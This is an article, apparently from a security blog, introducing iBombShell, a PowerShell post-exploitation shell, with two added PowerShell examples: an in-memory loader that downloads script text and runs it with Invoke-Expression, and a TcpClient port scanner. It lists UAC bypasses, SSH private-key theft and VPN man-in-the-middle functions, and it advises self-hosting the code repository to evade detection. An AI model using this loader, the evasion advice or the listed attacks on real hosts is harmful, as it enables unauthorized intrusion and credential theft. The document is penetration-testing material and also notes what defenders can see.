Suppose you have a shell on a system but your usual post-exploitation tools fail because a security solution on the host catches them. iBombShell is a dynamic remote shell that runs on any system with PowerShell. It is called dynamic because functions can be added and loaded on demand, as you need them, instead of being shipped as one large script.
What is iBombShell?
iBombShell is an open source, dynamic tool that provides post-exploitation functionality through a shell or prompt on systems that support PowerShell. Features are fetched from a repository only when they are needed and are loaded in memory, so nothing is written to the hard drive. The repository links are hard coded GitHub URLs, but they can be changed to point at your own repository. Doing so makes detection harder, because security products now watch for traffic to and from the well-known public code repositories, and a self-hosted repository avoids those known indicators. Keep in mind that loading script text in memory is still visible to AMSI and PowerShell script block logging, so "no disk write" does not mean "no trace".
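The loading pattern described above, as an added example that is not iBombShell's own code: a small loader fetches `<BaseUrl>/<Name>.ps1` (that repository layout is an assumption for the example), compiles it in memory, publishes the function in the session, and a companion function removes it again in the spirit of `clearfunction`. The demo at the bottom uses a constructed repository on local disk reached through a `file://` URL, so it runs without network access while exercising the same `WebClient` code path an `https://` URL would.

```powershell
# Added example (not iBombShell's own loader). Fetches a function's source from a
# repository URL, defines it in the running session and never writes it to disk.
# Repository layout "<BaseUrl>/<Name>.ps1" is an assumption made for this example.

function Import-RemoteFunction {
    param(
        [Parameter(Mandatory)][string]$BaseUrl,  # your repository root, e.g. a raw.githubusercontent.com URL
        [Parameter(Mandatory)][string]$Name      # name of the function and of its <Name>.ps1 file (assumed layout)
    )
    $url = "{0}/{1}.ps1" -f $BaseUrl.TrimEnd('/'), $Name

    # DownloadString returns the script as a string; nothing touches the file system.
    $source = (New-Object System.Net.WebClient).DownloadString($url)
    if ([string]::IsNullOrWhiteSpace($source)) { throw "Empty response from $url" }

    # Compile the downloaded text in this function's scope. This is the step that
    # AMSI and script block logging inspect, so "fileless" is not "invisible".
    Invoke-Expression $source
    $fn = Get-Item -Path "Function:\$Name" -ErrorAction SilentlyContinue
    if (-not $fn) { throw "Downloaded script did not define a function named '$Name'" }

    # Copy the compiled body into the global scope so it outlives this loader call.
    Set-Item -Path "Function:\global:$Name" -Value $fn.ScriptBlock
    Write-Verbose "Loaded $Name from $url"
}

function Remove-LoadedFunction {
    # Counterpart of the loader: drop a function that was published to the global scope.
    param([Parameter(Mandatory)][string]$Name)
    if (Get-Command -Name $Name -CommandType Function -ErrorAction SilentlyContinue) {
        Remove-Item -Path "Function:\global:$Name"
        return $true
    }
    return $false
}

# --- Offline demo with a constructed "repository" on the local disk -------------
# The file content below is made up for the demo; a file:// URL goes through the
# same WebClient path as https://, so the loader logic is exercised without network.
$repo = Join-Path ([IO.Path]::GetTempPath()) ("ibs-demo-" + [guid]::NewGuid())
New-Item -ItemType Directory -Path $repo | Out-Null
@'
function Get-Greeting {
    param([string]$Who = 'warrior')
    "hello, $Who"
}
'@ | Set-Content -Path (Join-Path $repo 'Get-Greeting.ps1')

$baseUrl = ([uri]$repo).AbsoluteUri            # e.g. file:///C:/Users/.../ibs-demo-<guid>
Import-RemoteFunction -BaseUrl $baseUrl -Name 'Get-Greeting' -Verbose
Get-Greeting -Who 'ibombshell'                 # the function now exists in the session
Remove-LoadedFunction -Name 'Get-Greeting'     # and is removed again
Get-Command Get-Greeting -ErrorAction SilentlyContinue
Remove-Item -Recurse -Force $repo
```

Swap the `file://` base URL for your own repository's raw URL to get the behaviour the article describes; the only change is the string passed as `-BaseUrl`. On a defended host, expect the `Invoke-Expression` step to be the point where AMSI or script block logging sees the downloaded text.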
Connect-backs are called ‘warriors’ and they do the work for you. iBombShell has two execution modes:
- everywhere: you run a single PowerShell command and the shell is loaded and executed directly from memory, giving you a prompt on the target itself.
- silent mode: you still launch it with a PowerShell command, but the resulting warrior is controlled from a C2 panel written in Python that listens for connections from warriors.
The functionality provided by iBombShell is divided into the events, scanner, system, bypassuac and post-exploitation categories. At the time of writing, the following functions are supported:
- events/txuleta: Prints static text.
- scanner/tcp-scan: Uses the .NET System.Net.Sockets.TcpClient class to connect to a port and reports whether it is open.
- system/loaderext: Downloads and loads additional functions.
- system/getprovider: Enumerates providers; implemented with Get-ChildItem.
- system/pshell: Executes PowerShell instructions.
- system/pshell-local: Executes PowerShell instructions in the same scope as iBombShell itself.
- system/clearfunction: Removes a loaded function.
- bypassuac/invoke-eventvwr: Bypasses UAC with a fileless technique that abuses eventvwr.exe.
- bypassuac/invoke-compmgmtlauncher: Bypasses UAC via DLL hijacking of CompMgmtLauncher.exe.
- bypassuac/invoke-environmentinjection: Bypasses UAC by injecting a crafted %windir% environment variable.
- post/extract-sshprivatekey: Extracts SSH private keys on Microsoft Windows 10 from the HKCU\Software\OpenSSH\Agent\Keys registry path.
- post/vpn-mitm: Creates a VPN man-in-the-middle using rasdial.exe.
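For the scanner entry above, here is an added example of a port check built on System.Net.Sockets.TcpClient, the class the article says tcp-scan uses. This is illustrative code, not iBombShell's scanner. It adds the one thing a practitioner always wants in such a check: a timeout via `BeginConnect` and a wait handle, so a filtered port (no SYN-ACK, no RST) is reported as `filtered` instead of stalling the scan. The demo starts a constructed loopback listener so the example runs offline.

```powershell
# Added example (not iBombShell's tcp-scan): TcpClient port check with a timeout.
# open     = TCP handshake completed
# closed   = the target answered with a reset (EndConnect threw)
# filtered = no answer within the timeout (typical of a firewall drop)
# error    = the connect attempt itself failed, e.g. name resolution

function Test-TcpPort {
    param(
        [Parameter(Mandatory)][string]$ComputerName,
        [Parameter(Mandatory)][int[]]$Port,
        [int]$TimeoutMs = 1000
    )
    foreach ($p in $Port) {
        $client = New-Object System.Net.Sockets.TcpClient
        $state  = 'filtered'
        try {
            # Asynchronous connect so we control how long we are willing to wait.
            $ar = $client.BeginConnect($ComputerName, $p, $null, $null)
            if ($ar.AsyncWaitHandle.WaitOne($TimeoutMs, $false)) {
                try {
                    $client.EndConnect($ar)     # completes the handshake or throws on refusal
                    $state = 'open'
                } catch {
                    $state = 'closed'           # connection refused (RST received)
                }
            }
        } catch {
            $state = 'error: ' + $_.Exception.Message
        } finally {
            $client.Close()
        }
        [pscustomobject]@{ Host = $ComputerName; Port = $p; State = $state }
    }
}

# Loopback demo with a constructed listener so the example runs without a network.
# The listener only needs to be bound; the OS completes the handshake from the backlog.
$listener = New-Object System.Net.Sockets.TcpListener([System.Net.IPAddress]::Loopback, 0)
$listener.Start()
$openPort = ([System.Net.IPEndPoint]$listener.LocalEndpoint).Port
Test-TcpPort -ComputerName '127.0.0.1' -Port $openPort, 1 -TimeoutMs 500 | Format-Table -AutoSize
$listener.Stop()
```

Against a real target, pass a list of ports and keep the timeout short; the cost of a scan is dominated by filtered ports, since open and closed ones answer immediately. Note that each probe is a full TCP connect and will appear in the target's connection logs.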
If a UAC bypass succeeds, a new warrior with a new ID is created and executed with higher privileges. From there you can imagine everything this tool lets you do!
Download iBombShell:
The iBombShell source code for version 0.0.1b, code named “the first boom”, can be found at this link. Installation is also simple if you want to use the Python C2 panel.